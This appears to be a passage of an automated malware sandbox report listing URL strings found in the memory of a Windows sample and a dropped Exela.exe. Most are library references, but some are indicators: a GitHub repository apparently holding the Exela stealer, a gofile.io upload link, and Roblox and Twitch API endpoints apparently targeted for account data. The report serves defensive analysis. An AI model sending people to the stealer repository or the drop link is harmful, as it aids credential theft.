            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1974121570.000002DCCEF1D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969112805.000002DCCEF19000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1987192175.000002DCCEF1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/ssl.html#ssl.OP_NO_COMPRESSION
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filepreviews.io/
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777B03000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003B.00000003.1758408950.000001B777B54000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003B.00000003.1758408950.000001B777B67000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003B.00000003.1758408950.000001B777B48000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003B.00000003.1758408950.000001B777B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 0000003B.00000003.1758408950.000001B777B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1661328748.000002DCCD0E5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662491897.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971643797.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969728459.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1972101982.000002DCCD0DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986072702.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662654764.000002DCCD0C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971539043.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965135302.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990080929.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aio-libs/aiohttp/discussions/6044
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
            Source: Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/9253
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1141)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652743092.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827086574.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1158)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652743092.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827086574.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1165)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652743092.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827086574.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1172)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652743092.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827086574.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1187)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652743092.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827086574.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1200)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652743092.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827086574.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1203)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670055005.000002DCCF63B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1968238543.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989717007.000002DCCF57B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1984324624.000002DCCF57A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670503006.000002DCCF5DD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970219696.000002DCCF53F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1976604985.000002DCCF578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/136
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1968238543.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989764898.000002DCCF597000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969997805.000002DCCF596000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/251
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670055005.000002DCCF63B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1968238543.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989717007.000002DCCF57B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1984324624.000002DCCF57A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670503006.000002DCCF5DD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970219696.000002DCCF53F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1976604985.000002DCCF578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/428
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986134334.000002DCCE918000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662654764.000002DCCD0C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1661328748.000002DCCD0E5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662491897.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971643797.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969728459.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1972101982.000002DCCD0DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986072702.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662654764.000002DCCD0C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971539043.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965135302.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990080929.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/28073
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.0/Exela-V2.0
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.0/Exela-V2.00
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.00
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.00D
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.0v
            Source: Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek).
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1661328748.000002DCCD0E5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662491897.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971643797.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969728459.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1972101982.000002DCCD0DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986072702.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662654764.000002DCCD0C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997146489.000002DCCFBE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/mn2lNW
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/mn2lNW)
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/mn2lNW)P
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gql.twitch.tv/gql
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gql.twitch.tv/gql:
